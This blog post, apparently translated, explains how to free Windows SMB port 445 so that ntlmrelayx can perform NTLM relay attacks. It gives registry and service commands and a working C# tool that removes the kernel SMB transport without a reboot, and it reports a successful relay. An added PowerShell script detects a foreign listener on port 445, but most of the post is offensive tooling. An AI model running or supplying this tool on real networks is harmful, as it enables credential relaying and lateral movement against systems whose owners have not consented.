445 SMB Release
Preface: exploiting a printer bug in practice together with a cross-protocol relay to an external server is fairly cumbersome. If the current host is Windows, one can instead try to release the local port 445 and then use ntlmrelayx for the relay. Here I write the code that releases SMB port 445 and briefly record my notes.
Reference: https://www.cnblogs.com/zpchcbd/p/17912581.html
Reference: https://github.com/LuemmelSec/ntlmrelayx.py_to_exe
Background
The reference article above mentions that the local Windows port 445 can be released (closed), but the host has to be rebooted after the steps are run, which is inconvenient:

```powershell
reg add HKLM\SYSTEM\CurrentControlSet\Services\NetBT /v SMBDeviceEnabled /t REG_QWORD /d 0
Stop-Service "LanmanServer" -Force
Set-Service "LanmanServer" -StartupType Disabled
Reboot
```
Code implementation
With the following code, port 445 can be released without a reboot: it enumerates the SMB server's bound transports with NetServerTransportEnum and removes the \Device\NetbiosSmb transport with NetServerTransportDel, so the kernel SMB server no longer listens on 445.
```csharp
using System;
using System.Runtime.InteropServices;
using System.Text;

namespace ReleaseSMB
{
    public class Program
    {
        private const int NERR_Success = 0;
        private const int MAX_PREFERRED_LENGTH = -1;
        private const int ERROR_MORE_DATA = 234;

        // Enumerates the transports bound to the local SMB server (level 0 entries).
        // resumehandle is in/out on the native side, so it is declared ref, not out.
        [DllImport("Netapi32.dll", CharSet = CharSet.Unicode)]
        public static extern int NetServerTransportEnum(
            string servername,
            int level,
            out IntPtr bufptr,
            int prefmaxlen,
            out int entriesread,
            out int totalentries,
            ref int resumehandle);

        [DllImport("Netapi32.dll")]
        public static extern int NetApiBufferFree(IntPtr Buffer);

        // Unbinds the transport described by the SERVER_TRANSPORT_INFO_0 at bufptr.
        [DllImport("Netapi32.dll", CharSet = CharSet.Unicode)]
        public static extern int NetServerTransportDel(
            string servername,
            int level,
            IntPtr bufptr);

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct SERVER_TRANSPORT_INFO_0
        {
            public int svti0_numberofvcs;
            public string svti0_transportname;
            // LPBYTE in the native struct: a raw NetBIOS-name buffer, not a
            // null-terminated wide string, so it is kept as a pointer.
            public IntPtr svti0_transportaddress;
            public int svti0_transportaddresslength;
            public string svti0_networkaddress;
        }

        public static bool DisconnectTransport(string transport)
        {
            int entriesRead;
            int totalEntries;
            int resumeHandle = 0;
            IntPtr buffer = IntPtr.Zero;
            int totalCount = 0;
            bool found = false;

            do
            {
                int result = NetServerTransportEnum(null, 0, out buffer, MAX_PREFERRED_LENGTH,
                    out entriesRead, out totalEntries, ref resumeHandle);

                if (result == NERR_Success || result == ERROR_MORE_DATA)
                {
                    int entrySize = Marshal.SizeOf(typeof(SERVER_TRANSPORT_INFO_0));
                    for (int i = 0; i < entriesRead; i++)
                    {
                        // Pointer to the i-th entry in the returned array; the same pointer
                        // is handed to NetServerTransportDel so the matching entry is removed.
                        IntPtr entryPtr = new IntPtr(buffer.ToInt64() + (long)entrySize * i);
                        SERVER_TRANSPORT_INFO_0 sti = (SERVER_TRANSPORT_INFO_0)Marshal.PtrToStructure(
                            entryPtr, typeof(SERVER_TRANSPORT_INFO_0));

                        Console.WriteLine("\tFound Transport: " + sti.svti0_transportname);

                        if (sti.svti0_transportname.Equals(transport))
                        {
                            int status = NetServerTransportDel(null, 0, entryPtr);
                            if (status == NERR_Success)
                            {
                                Console.WriteLine($"\tDeleted {transport}");
                                found = true;
                            }
                            else
                            {
                                Console.WriteLine($"\tError {status} while deleting {transport}");
                            }
                        }
                        totalCount++;
                    }
                }
                else
                {
                    Console.WriteLine($"A system error has occurred: {result}");
                }

                // Free the buffer allocated by the API
                if (buffer != IntPtr.Zero)
                {
                    NetApiBufferFree(buffer);
                    buffer = IntPtr.Zero;
                }
            } while (totalEntries > 0 && resumeHandle != 0);

            Console.WriteLine($"Total of {totalCount} entries enumerated");
            return found;
        }

        public static void Main(string[] args)
        {
            DisconnectTransport("\\Device\\NetbiosSmb");
        }
    }
}
```
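From the defender's side, both the reboot-based procedure above and the transport-removal code leave the same observable trace: either nothing listens on 445 while LanmanServer is still configured to run, or a user-mode process rather than the kernel (PID 4, "System") owns the 445 listener. The following PowerShell check is an added example, not code from the original post or from the referenced project; it assumes Windows 8 / Server 2012 or later (for Get-NetTCPConnection) and a session allowed to query services and the NetBT registry key. The SMBDeviceEnabled value is read from NetBT\Parameters, which is where that setting lives.

```powershell
# Added example: report the state of SMB port 445 on this host so that an unbound
# SMB transport or a foreign 445 listener can be noticed during triage.
function Get-Smb445State {
    $svc = Get-Service -Name LanmanServer -ErrorAction SilentlyContinue
    $state = [ordered]@{
        LanmanServerStatus = if ($svc) { $svc.Status } else { 'missing' }
        LanmanServerStart  = if ($svc) { $svc.StartType } else { 'missing' }
        SMBDeviceEnabled   = 'default (enabled)'   # value absent means SMB over TCP is on
        Listener445        = @()
        ForeignListener445 = $false
    }

    # The reboot-based method sets this value to 0 to disable SMB on 445.
    $p = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters' `
                          -Name SMBDeviceEnabled -ErrorAction SilentlyContinue
    if ($p) { $state.SMBDeviceEnabled = $p.SMBDeviceEnabled }

    # Every listener on 445 and the process owning it. The kernel SMB server is
    # reported as PID 4 (System); anything else on 445 is a user-mode program,
    # which is exactly what removing the \Device\NetbiosSmb transport makes possible.
    Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            $state.Listener445 += [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                OwningPid    = $_.OwningProcess
                ProcessName  = if ($proc) { $proc.ProcessName } else { 'unknown' }
            }
            if ($_.OwningProcess -ne 4) { $state.ForeignListener445 = $true }
        }

    [pscustomobject]$state
}

$s = Get-Smb445State
$s | Format-List

if ($s.ForeignListener445) {
    Write-Warning 'Port 445 is owned by a user-mode process; the SMB transport may have been removed.'
} elseif (-not $s.Listener445 -and $s.LanmanServerStatus -eq 'Running') {
    Write-Warning 'LanmanServer is running but nothing listens on 445; check its bound transports.'
}
```

Run it in an elevated session on a host you administer; on an untouched machine you should see one entry per local address on 445 with OwningPid 4, LanmanServer Running, and SMBDeviceEnabled at its default. A non-System owner or an empty listener list while the service is running is the condition worth alerting on, and the removal itself can be caught earlier by monitoring the srvsvc transport-removal calls (NetServerTransportDel) from unexpected processes.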
Demonstration
Before running SMB Release, the state is as shown in the figure below.
After running SMB Release, the state is as shown in the figure below. The error in the figure is not a problem with the SMB port; it is that port 443 is in use, since this machine currently has an HTTP service running on 443.
The relay result is shown in the figure below and runs normally.